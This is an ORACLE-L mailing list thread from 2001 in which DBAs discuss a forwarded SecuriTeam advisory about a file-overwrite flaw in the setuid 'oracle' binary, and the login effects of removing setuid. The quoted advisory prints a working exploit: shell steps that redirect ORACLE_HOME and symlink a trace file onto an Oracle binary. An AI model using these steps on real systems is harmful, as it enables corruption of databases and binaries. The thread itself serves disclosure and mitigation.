Doh! I didn't even consider that. Via SQL*Net works properly of course. Jared On Friday 10 August 2001 18:45, John Kanagaraj wrote: > Joe, > > Don't mind if I switch to size 12 font - my eyes are giving out :) > > A small correction - If the suid is taken off 'oracle', only 'oracle' will > be able to log on *locally*, i.e. if you are using ORACLE_SID and login via > local SQL*Plus or forms/reports. Other *NIX users will recieve an 'unable > to attach to SHM' error. This is because the non-'oracle' user will not > have permission either to read/write from SHM or the datafiles. They can do > so only when assuming the privs via SUID on the 'oracle' binary. When > connecting via SQL*Net, the listener starts up all processes under the > 'oracle' and thus assume all privs, so any user can connect via SQL*Net. To > connect locally without errors in this case, set TWO_TASK rather than > ORACLE_SID. > > Hope that clarifies! > John Kanagaraj > Oracle Applications DBA > DB Soft Inc > Work : (408) 970 7002 > > Listen to great, commercial-free christian music 24x7x365 at > http://www.klove.com <http://www.klove.com/> > > ** The opinions and facts contained in this message are entirely mine and > do not reflect those of my employer or customers ** > > > > > -----Original Message----- > Sent: Friday, August 10, 2001 12:26 PM > To: Multiple recipients of list ORACLE-L > > > > problem is if you take off the suid but only oracle will be able log on if > i rememebr correctly. > > joe > > >>> [EMAIL PROTECTED] 08/10/01 12:50PM >>> > > Anyone come across this before ?? > > Lee > > > The following security advisory is sent to the securiteam mailing list, > > and can be found at the SecuriTeam web site: http://www.securiteam.com > > <http://www.securiteam.com> > > > Vulnerability Found In 'oracle' Binary > > ------------------------------------------------------------------------ > > > > > > SUMMARY > > There is a write permission checking error in the 'oracle' binary that > > can be used by local users to overwrite any file owned by the oracle > > user. This would allow a local user to corrupt database files, overwrite > > existing oracle binaries, etc. > > DETAILS > > Vulnerable systems: > > Oracle version 8.0.5 up to version 8.1.6 > > Temporary solution: > > Remove the setuid oracle off the oracle binary: > > # chmod -s oracle > > Exploit: > > $ cd /tmp > > $ mkdir rdbms > > $ cd rdbms/ > > $ mkdir log > > $ cd log > > $ > > $ ls -alc > > total 8 > > drwxrwxr-x 2 pask pask 4096 dic 14 02:33 . > > drwxrwxr-x 3 pask pask 4096 dic 14 02:33 . > > $ export ORACLE_HOME=/tmp > > $ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5 > > $ $REAL_ORACLE_HOME/bin/oracle > > $ ls -alc > > total 12 > > drwxrwxr-x 2 pask pask 4096 dic 14 02:35 . > > drwxrwxr-x 3 pask pask 4096 dic 14 02:33 . > > * rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc > > > > $ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc > > $ $REAL_ORACLE_HOME/bin/oracle > > $ $REAL_ORACLE_HOME/bin/oracle > > $ $REAL_ORACLE_HOME/bin/oracle > > $ $REAL_ORACLE_HOME/bin/oracle > > > > > > ======================================== > > > > > > This bulletin is sent to members of the SecuriTeam mailing list. > > To unsubscribe from the list, send mail with an empty subject line and > > body to: [EMAIL PROTECTED] > > In order to subscribe to the mailing list, simply forward this email to: > > [EMAIL PROTECTED] > > > > ==================== > > ==================== > > > > DISCLAIMER: > > The information in this bulletin is provided "AS IS" without warranty of > > any kind. > > In no event shall we be liable for any damages whatsoever including > > direct, indirect, incidental, consequential, loss of business profits or > > special damages. > > The information contained in this communication is > confidential, is intended only for the use of the recipient > named above, and may be legally privileged. If the reader > of this message is not the intended recipient, you are > hereby notified that any dissemination, distribution or > copying of this communication is strictly prohibited. > If you have received this communication in error, please > re-send this communication to the sender and delete the > original message or any copy of it from your computer > system. -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jared Still INET: [EMAIL PROTECTED] Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).